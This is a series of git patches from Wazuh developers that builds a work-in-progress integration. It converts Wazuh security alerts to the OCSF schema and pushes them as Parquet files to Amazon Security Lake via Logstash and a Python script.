From 159adcb5e33ab0d3b99fd274f00a0e38028b075d Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Mon, 5 Feb 2024 15:47:23 -0300
Subject: [PATCH 01/34] Adding Python script that receives a continuous json
 stream over stdin and outputs parquet to Security Lake

---
 integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100755 integrations/stdin_to_securitylake.py

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
new file mode 100755
index 0000000000000..fd70e41906ccb
--- /dev/null
+++ b/integrations/stdin_to_securitylake.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python3
+
+import os
+import sys
+import argparse
+import logging
+import time
+from datetime import datetime
+from pyarrow import json
+import pyarrow.parquet as pq
+
+def encode_parquet(json_list):
+  for json in json_list:
+    ### read_json is meant for files, need to change it to read from a string
+    ### https://arrow.apache.org/docs/python/json.html 
+    table = json.read_json(json)
+    pq.write_table(table, 'parquet/output.parquet')
+
+def push_to_s3(parquet):
+  ## Fill with AWS S3 code
+  pass
+
+def read_chunk(fileobject,length):
+  output=[]
+  for i in range(0,length):
+    line = fileobject.readline()
+    if line is '':
+      output.append(line)
+      break 
+    output.append(line)
+  return output
+
+def get_elapsedtime(reference_timestamp):
+  current_time = datetime.now(tz='UTC')  
+  return (current_time - reference_timestamp).total_seconds()
+
+if __name__ == "__main__":
+
+  clock = datetime.now(tz='UTC')
+  clockstr = clock.strftime('%F_%H:%M:%S')
+  
+  parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
+
+  parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer')
+  parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer')
+  parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer')
+  parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer')
+  
+  debugging = parser.add_argument_group('debugging')
+  debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
+  debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')
+  
+  args = parser.parse_args()
+  
+  logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG)
+  logging.debug("Running main()")
+  logging.debug("Current time is " + str(clockstr) )
+
+  try: 
+    logging.info('BUFFERING STDIN')
+
+    with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin:
+
+      output_buffer = []
+
+      starttimestamp = datetime.now(tz='UTC')
+      
+      try:
+        while True:
+          output_buffer.append(read_chunk(stdin,args.linebuffer))
+          if output_buffer[len(output_buffer)-1] is '':
+            time.sleep(args.sleeptime)
+          if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval:
+            encode_parquet(output_buffer)
+            logging.debug(output_buffer)
+            starttimestamp = datetime.now(tz='UTC')
+            output_buffer = []
+      except KeyboardInterrupt:
+        logging.info("Keyboard Interrupt issued")
+        exit(0)
+        
+
+    logging.info('FINISHED RETRIEVING STDIN')
+  except Exception as e:
+    logging.error("Error running script")
+    exit(1)

From 6e17aae0dc430737a6f73d239dd991b6b219d418 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Mon, 5 Feb 2024 15:50:39 -0300
Subject: [PATCH 02/34] Adding logstash pipeline for python script

---
 .../amazon-security-lake/pipe-output.conf     | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 integrations/amazon-security-lake/pipe-output.conf

diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf
new file mode 100644
index 0000000000000..4f64eb5a46a54
--- /dev/null
+++ b/integrations/amazon-security-lake/pipe-output.conf
@@ -0,0 +1,35 @@
+input {
+   opensearch {
+      hosts =>  ["127.0.0.1:9200"]
+      user  =>  "${WAZUH_INDEXER_USERNAME}"
+      password  =>  "${WAZUH_INDEXER_PASSWORD}"
+      index =>  "wazuh-alerts-4.x-*"
+      ssl => true
+      ca_file => "/etc/logstash/wi-certs/root-ca.pem"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+			target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+output {
+
+	stdout { codec => rubydebug }
+
+	pipe
+	{
+		id => "securityLake"
+		message_format => "%{_source}"
+		ttl => "10"
+		command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d"
+	}
+
+}

From a05c23c080f6592fc5a4a53617983d558cebb752 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 13:23:34 -0300
Subject: [PATCH 03/34] encode_parquet() function fixed to handle lists of
 dictionaries

---
 integrations/stdin_to_securitylake.py | 65 ++++++++++++---------------
 1 file changed, 29 insertions(+), 36 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index fd70e41906ccb..a8295ed139262 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -5,16 +5,15 @@
 import argparse
 import logging
 import time
+import json
 from datetime import datetime
-from pyarrow import json
-import pyarrow.parquet as pq
+from pyarrow import json, parquet, Table
 
-def encode_parquet(json_list):
-  for json in json_list:
-    ### read_json is meant for files, need to change it to read from a string
-    ### https://arrow.apache.org/docs/python/json.html 
-    table = json.read_json(json)
-    pq.write_table(table, 'parquet/output.parquet')
+chunk_ending = { "chunk_ending": True }
+
+def encode_parquet(list):
+  table = Table.from_pylist(list)
+  pq.write_table(table, '/tmp/{}.parquet'.format(clockstr))
 
 def push_to_s3(parquet):
   ## Fill with AWS S3 code
@@ -24,63 +23,57 @@ def read_chunk(fileobject,length):
   output=[]
   for i in range(0,length):
     line = fileobject.readline()
-    if line is '':
-      output.append(line)
+    if line == '':
+      output.append(chunk_ending)
       break 
-    output.append(line)
+    output.append(json.loads(line))
   return output
 
-def get_elapsedtime(reference_timestamp):
+def get_elapsedseconds(reference_timestamp):
   current_time = datetime.now(tz='UTC')  
   return (current_time - reference_timestamp).total_seconds()
-
-if __name__ == "__main__":
-
-  clock = datetime.now(tz='UTC')
-  clockstr = clock.strftime('%F_%H:%M:%S')
   
+def parse_arguments():
   parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
-
-  parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer')
-  parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer')
-  parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer')
-  parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer')
-  
+  parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length')
+  parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake')
+  parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval')
+  parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake')
   debugging = parser.add_argument_group('debugging')
   debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
   debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')
-  
   args = parser.parse_args()
-  
-  logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG)
-  logging.debug("Running main()")
-  logging.debug("Current time is " + str(clockstr) )
 
+if __name__ == "__main__":
+  clock = datetime.now(tz='UTC')
+  clockstr = clock.strftime('%F_%H.%M.%S')
+  parse_arguments()
+  logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG)
+  logging.info('BUFFERING STDIN')
+  
   try: 
-    logging.info('BUFFERING STDIN')
 
     with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin:
-
       output_buffer = []
-
       starttimestamp = datetime.now(tz='UTC')
       
       try:
         while True:
           output_buffer.append(read_chunk(stdin,args.linebuffer))
-          if output_buffer[len(output_buffer)-1] is '':
+          if output_buffer[len(output_buffer)-1] == chunk_ending :
             time.sleep(args.sleeptime)
-          if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval:
-            encode_parquet(output_buffer)
-            logging.debug(output_buffer)
+          if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
+            push_to_s3(encode_parquet(output_buffer))
+            logging.debug(json.dumps(output_buffer))
             starttimestamp = datetime.now(tz='UTC')
             output_buffer = []
+
       except KeyboardInterrupt:
         logging.info("Keyboard Interrupt issued")
         exit(0)
-        
 
     logging.info('FINISHED RETRIEVING STDIN')
+
   except Exception as e:
     logging.error("Error running script")
     exit(1)

From e04f0d53846556fbeb3a6eced7e71fc77b509344 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 13:25:13 -0300
Subject: [PATCH 04/34] Correct error in encode_parquet()

---
 integrations/stdin_to_securitylake.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index a8295ed139262..e11c23378b15b 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -7,13 +7,13 @@
 import time
 import json
 from datetime import datetime
-from pyarrow import json, parquet, Table
+from pyarrow import parquet, Table
 
 chunk_ending = { "chunk_ending": True }
 
 def encode_parquet(list):
   table = Table.from_pylist(list)
-  pq.write_table(table, '/tmp/{}.parquet'.format(clockstr))
+  parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr))
 
 def push_to_s3(parquet):
   ## Fill with AWS S3 code

From 93935fc24dd0fe5d2a1519d0b5ec01e51cb05994 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 13:59:12 -0300
Subject: [PATCH 05/34] Avoid storing the block ending in the output buffer

---
 integrations/stdin_to_securitylake.py | 15 ++++++++++-----
 1 file changed, 10 insertions(+), 5 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index e11c23378b15b..034b729c1208d 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -9,7 +9,10 @@
 from datetime import datetime
 from pyarrow import parquet, Table
 
-chunk_ending = { "chunk_ending": True }
+block_ending = { "block_ending": True }
+
+def map_to_ocsf():
+  ## Code that translates fields to OCSF
 
 def encode_parquet(list):
   table = Table.from_pylist(list)
@@ -19,12 +22,12 @@ def push_to_s3(parquet):
   ## Fill with AWS S3 code
   pass
 
-def read_chunk(fileobject,length):
+def read_block(fileobject,length):
   output=[]
   for i in range(0,length):
     line = fileobject.readline()
     if line == '':
-      output.append(chunk_ending)
+      output.append(block_ending)
       break 
     output.append(json.loads(line))
   return output
@@ -59,14 +62,16 @@ def parse_arguments():
       
       try:
         while True:
-          output_buffer.append(read_chunk(stdin,args.linebuffer))
-          if output_buffer[len(output_buffer)-1] == chunk_ending :
+          current_block = read_block(stdin,args.linebuffer)
+          if current_block[-1] == block_ending :
+            output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)
           if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
             push_to_s3(encode_parquet(output_buffer))
             logging.debug(json.dumps(output_buffer))
             starttimestamp = datetime.now(tz='UTC')
             output_buffer = []
+          output_buffer.append(current_block)
 
       except KeyboardInterrupt:
         logging.info("Keyboard Interrupt issued")

From 1db384c0da0b0b2f60173861aa87a1c27e05494b Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 16:40:01 -0300
Subject: [PATCH 06/34] Add comments on handling files and streams with pyarrow
 for future reference

---
 integrations/stdin_to_securitylake.py | 17 ++++++++++++-----
 1 file changed, 12 insertions(+), 5 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 034b729c1208d..1604bc2ed9ebc 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -15,13 +15,14 @@ def map_to_ocsf():
   ## Code that translates fields to OCSF
 
 def encode_parquet(list):
+  ### We can write directly to S3 from pyarrow:
+  ### https://arrow.apache.org/docs/python/filesystems.html#s3
+  ###
+  ### Credentials can be stored in /root/.aws/credentials
+  ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html
   table = Table.from_pylist(list)
   parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr))
 
-def push_to_s3(parquet):
-  ## Fill with AWS S3 code
-  pass
-
 def read_block(fileobject,length):
   output=[]
   for i in range(0,length):
@@ -62,12 +63,18 @@ def parse_arguments():
       
       try:
         while True:
+          ### We can possibly replace all the custom code here
+          ### and just use Arrow's built-in input and output facilities:
+          ### * https://arrow.apache.org/docs/python/memory.html#input-and-output
+          ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas
+          ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory
+
           current_block = read_block(stdin,args.linebuffer)
           if current_block[-1] == block_ending :
             output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)
           if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
-            push_to_s3(encode_parquet(output_buffer))
+            encode_parquet(output_buffer)
             logging.debug(json.dumps(output_buffer))
             starttimestamp = datetime.now(tz='UTC')
             output_buffer = []

From c60045fbcf5a7ebd55be6054969f0f4c0fc3c46f Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 16:56:27 -0300
Subject: [PATCH 07/34] Add s3 handling reference links

---
 integrations/stdin_to_securitylake.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 1604bc2ed9ebc..d176bb38b004e 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -7,16 +7,19 @@
 import time
 import json
 from datetime import datetime
-from pyarrow import parquet, Table
+from pyarrow import parquet, Table, fs
 
 block_ending = { "block_ending": True }
 
+s3 = fs.S3FileSystem(region='eu-west-3')
+
 def map_to_ocsf():
   ## Code that translates fields to OCSF
 
 def encode_parquet(list):
   ### We can write directly to S3 from pyarrow:
   ### https://arrow.apache.org/docs/python/filesystems.html#s3
+  ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream
   ###
   ### Credentials can be stored in /root/.aws/credentials
   ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html

From 8949097be444871ed6db264c1133c1d005f6fdf3 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Tue, 6 Feb 2024 17:03:00 -0300
Subject: [PATCH 08/34] Write parquet directly to bucket

---
 integrations/stdin_to_securitylake.py | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index d176bb38b004e..2b8a1de14755b 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -16,15 +16,16 @@
 def map_to_ocsf():
   ## Code that translates fields to OCSF
 
-def encode_parquet(list):
+def encode_parquet(list,bucket_name,folder):
   ### We can write directly to S3 from pyarrow:
   ### https://arrow.apache.org/docs/python/filesystems.html#s3
   ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream
   ###
   ### Credentials can be stored in /root/.aws/credentials
   ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html
+
   table = Table.from_pylist(list)
-  parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr))
+  parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder))
 
 def read_block(fileobject,length):
   output=[]
@@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp):
   
 def parse_arguments():
   parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
-  parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length')
-  parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake')
-  parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval')
-  parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake')
+  parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket')
+  parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder')
+  parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake')
+  parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake')
+  parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length')
+  parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval')
   debugging = parser.add_argument_group('debugging')
   debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
   debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')
@@ -77,7 +80,7 @@ def parse_arguments():
             output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)
           if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
-            encode_parquet(output_buffer)
+            encode_parquet(output_buffer,args.bucketname,args.foldername)
             logging.debug(json.dumps(output_buffer))
             starttimestamp = datetime.now(tz='UTC')
             output_buffer = []

From eb7ace3c3c4a02388596c36584766deb06a902da Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Wed, 7 Feb 2024 18:08:52 -0300
Subject: [PATCH 09/34] Added basics of map_to_ocsf() function

---
 integrations/ocsf-mapping.json        | 42 +++++++++++++++++++++++++++
 integrations/stdin_to_securitylake.py | 22 +++++++++++---
 2 files changed, 60 insertions(+), 4 deletions(-)
 create mode 100644 integrations/ocsf-mapping.json

diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json
new file mode 100644
index 0000000000000..b2cf6d3b8d3f7
--- /dev/null
+++ b/integrations/ocsf-mapping.json
@@ -0,0 +1,42 @@
+{	
+	"constants":
+	{
+		"activity_id" : 1,
+		"analytic.type" : "Rule",
+		"analytic.type_id" : 1,
+		"attacks.version" : "v13.1",
+		"category_name" : "Findings",
+		"category_uid" : 2,
+		"class_name" : "Security Finding",
+		"class_uid" : 2001,
+		"metadata.log_name" : "Security events",
+		"metadata.log_provider" : "Wazuh",
+		"metadata.product.lang" : "en",
+		"metadata.product.name" : "Wazuh",
+		"metadata.product.vendor_name" : "Wazuh, Inc.",
+		"metadata.product.version" : "4.9.0",
+		"state_id" : 99,
+		"type_uid" : 200101
+	},
+	"mappings":
+	{
+		"analytic.category" : "rule.groups",
+		"analytic.name" : "decoder.name",
+		"analytic.uid" : "rule.id",
+		"attacks.tactics" : "rule.mitre.tactic",
+		"attacks.technique" : "rule.mitre.technique",
+		"count" : "rule.firedtimes",
+		"data_sources" : ["_index", "location", "manager.name"], 
+		"finding.title" : "rule.description",
+		"finding.type" : "input.type",
+		"finding.uid" : "id",
+		"message" : "rule.description",
+		"nist" : "rule.nist_800_53",
+		"raw_data" : "full_log",
+		"resources.name" : "agent.name",
+		"resources.uid" : "agent.id",
+		"risk_score" : "rule.level",
+		"severity_id" : "rule.level",
+		"time" : "timestamp"
+	}
+}
diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 2b8a1de14755b..d125a2ff6d56b 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -11,17 +11,30 @@
 
 block_ending = { "block_ending": True }
 
-s3 = fs.S3FileSystem(region='eu-west-3')
+s3 = fs.S3FileSystem()
 
-def map_to_ocsf():
-  ## Code that translates fields to OCSF
+def map_to_ocsf(alert_dictionary,ocsf_mapping_filename):
+  ocsf_alert = {}
+  with open(ocsf_mapping_filename) as jsonfile:
+    mappings = json.loads(jsonfile.read())
+  ### Put constants into the output alert
+  ocsf_alert |= mappings['constants']
+
+  for key in mappings['mappings']:
+    dotted_destination_field = mappings['mappings'].get(key)
+    depth_levels = dotted_destination.split('.')
+    current_level = alert_dictionary[depth_levels[0]]
+    if len(depth_levels>1):
+      for field in depth_levels[1:]:
+        current_level = current_level[field]
+    ocsf_alert[key] = current_level
 
 def encode_parquet(list,bucket_name,folder):
   ### We can write directly to S3 from pyarrow:
   ### https://arrow.apache.org/docs/python/filesystems.html#s3
   ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream
   ###
-  ### Credentials can be stored in /root/.aws/credentials
+  ### Credentials can be stored in ~/.aws/credentials
   ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html
 
   table = Table.from_pylist(list)
@@ -49,6 +62,7 @@ def parse_arguments():
   parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake')
   parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length')
   parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval')
+  parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)')
   debugging = parser.add_argument_group('debugging')
   debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
   debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging')

From 3d7b8ff585d5680fce00a5cdf60bbce2b3c5307f Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Wed, 7 Feb 2024 18:41:04 -0300
Subject: [PATCH 10/34] Minor fixes

---
 integrations/stdin_to_securitylake.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index d125a2ff6d56b..51cb67a49ac29 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -42,11 +42,12 @@ def encode_parquet(list,bucket_name,folder):
 
 def read_block(fileobject,length):
   output=[]
-  for i in range(0,length):
+  for line in range(0,length):
     line = fileobject.readline()
     if line == '':
       output.append(block_ending)
       break 
+    alert = json.loads(line)
     output.append(json.loads(line))
   return output
 

From 545f855a679015d214c04588fb7758311701cc0c Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Wed, 7 Feb 2024 18:54:18 -0300
Subject: [PATCH 11/34] Map alerts to OCSF as they are read

---
 integrations/stdin_to_securitylake.py | 24 +++++++++++++-----------
 1 file changed, 13 insertions(+), 11 deletions(-)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 51cb67a49ac29..3a6145747783a 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -13,12 +13,10 @@
 
 s3 = fs.S3FileSystem()
 
-def map_to_ocsf(alert_dictionary,ocsf_mapping_filename):
-  ocsf_alert = {}
-  with open(ocsf_mapping_filename) as jsonfile:
-    mappings = json.loads(jsonfile.read())
+def map_to_ocsf(alert_dictionary, mappings, ocsf_output):
+  ocsf_output = {}
   ### Put constants into the output alert
-  ocsf_alert |= mappings['constants']
+  ocsf_output |= mappings['constants']
 
   for key in mappings['mappings']:
     dotted_destination_field = mappings['mappings'].get(key)
@@ -27,7 +25,7 @@ def map_to_ocsf(alert_dictionary,ocsf_mapping_filename):
     if len(depth_levels>1):
       for field in depth_levels[1:]:
         current_level = current_level[field]
-    ocsf_alert[key] = current_level
+    ocsf_output[key] = current_level
 
 def encode_parquet(list,bucket_name,folder):
   ### We can write directly to S3 from pyarrow:
@@ -38,17 +36,19 @@ def encode_parquet(list,bucket_name,folder):
   ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html
 
   table = Table.from_pylist(list)
-  parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder))
+  parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder))
 
-def read_block(fileobject,length):
+def map_block(fileobject, length, mappings):
   output=[]
-  for line in range(0,length):
+  for line in range(0, length):
     line = fileobject.readline()
     if line == '':
       output.append(block_ending)
       break 
     alert = json.loads(line)
-    output.append(json.loads(line))
+    ocsf_mapped_alert = {}
+    map_to_ocsf(alert, mappings, ocsf_mapped_alert):
+    output.append(ocsf_mapped_alert)
   return output
 
 def get_elapsedseconds(reference_timestamp):
@@ -77,6 +77,8 @@ def parse_arguments():
   logging.info('BUFFERING STDIN')
   
   try: 
+    with open(ocsf_mapping_filename) as jsonfile:
+      mappings = json.loads(jsonfile.read())
 
     with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin:
       output_buffer = []
@@ -90,7 +92,7 @@ def parse_arguments():
           ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas
           ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory
 
-          current_block = read_block(stdin,args.linebuffer)
+          current_block = map_block(stdin, args.linebuffer, mappings)
           if current_block[-1] == block_ending :
             output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)

From f753b1235f54b6b94dc94f242808256829e40e94 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 8 Feb 2024 19:45:53 +0100
Subject: [PATCH 12/34] Add script to convert Wazuh events to OCSF

Also adds a simple test script
---
 .../amazon-security-lake/ocsf/__init__.py     |  2 +
 .../amazon-security-lake/ocsf/converter.py    | 82 +++++++++++++++++
 .../amazon-security-lake/ocsf/test.py         | 15 ++++
 .../ocsf/wazuh-event.sample.json              | 90 +++++++++++++++++++
 4 files changed, 189 insertions(+)
 create mode 100644 integrations/amazon-security-lake/ocsf/__init__.py
 create mode 100644 integrations/amazon-security-lake/ocsf/converter.py
 create mode 100644 integrations/amazon-security-lake/ocsf/test.py
 create mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json

diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py
new file mode 100644
index 0000000000000..777a7d20549b5
--- /dev/null
+++ b/integrations/amazon-security-lake/ocsf/__init__.py
@@ -0,0 +1,2 @@
+# Python module placeholder
+# TODO export submodules
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
new file mode 100644
index 0000000000000..a9168aead1e1a
--- /dev/null
+++ b/integrations/amazon-security-lake/ocsf/converter.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python
+
+# event comes from Filebeat
+event = {}
+
+def normalize(level: int) -> int:
+    """
+    Normalizes rule level into the 0-6 range, required by OCSF.
+    """
+    # TODO normalization
+    return level
+
+def convert(event: dict) -> dict:
+    """
+    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
+    """
+    ocsf_class_template = \
+    {
+        "activity_id": 1,
+        "category_name": "Findings",
+        "category_uid": 2,
+        "class_name": "Detection Finding",
+        "class_uid": 2004,
+        "count": event["_source"]["rule"]["firedtimes"],
+        "message": event["_source"]["rule"]["description"],
+        "finding_info": {
+            "analytic": {
+                "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string
+                "name": event["_source"]["decoder"]["name"],
+                "type": "Rule", # analytic.type is redundant together with type_id
+                "type_id": 1,
+                "uid": event["_source"]["rule"]["id"], 
+            },
+            "attacks": {
+                "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object
+                "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object
+                "version": "v13.1"
+            },
+            "title": event["_source"]["rule"]["description"],
+            "types": [
+                event["_source"]["input"]["type"]
+            ],
+            "uid": event["_source"]['id']
+        },
+        "metadata": {
+            "log_name": "Security events",
+            "log_provider": "Wazuh",
+            "product": {
+                "name": "Wazuh",
+                # Skipped. 
+                # OCSF description of this field is: The version of the product, as
+                # defined by the event source. For example: 2013.1.3-beta. We do not
+                # save such info as part of the event data.
+                # "version": "4.9.0", 
+                "lang": "en",
+                "vendor_name": "Wazuh, Inc,."
+            },
+            "version": "1.1.0",
+        },
+        "raw_data": event["_source"]["full_log"],
+        "resources": [
+            {
+                "name": event["_source"]["agent"]["name"],
+                "uid": event["_source"]["agent"]["id"]
+            },
+        ],
+        "risk_score": event["_source"]["rule"]["level"],
+        "severity_id": normalize(event["_source"]["rule"]["level"]),
+        "status_id": 99,
+        "time": event["_source"]["timestamp"],
+        "type_uid": 200401,
+        "unmapped": {
+            "data_sources": [
+                event["_index"],
+                event["_source"]["location"],
+                event["_source"]["manager"]["name"]
+            ],
+            "nist": event["_source"]["rule"]["nist_800_53"], # Array
+        }
+    }
+
+    return ocsf_class_template
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/ocsf/test.py
new file mode 100644
index 0000000000000..e7d947848b067
--- /dev/null
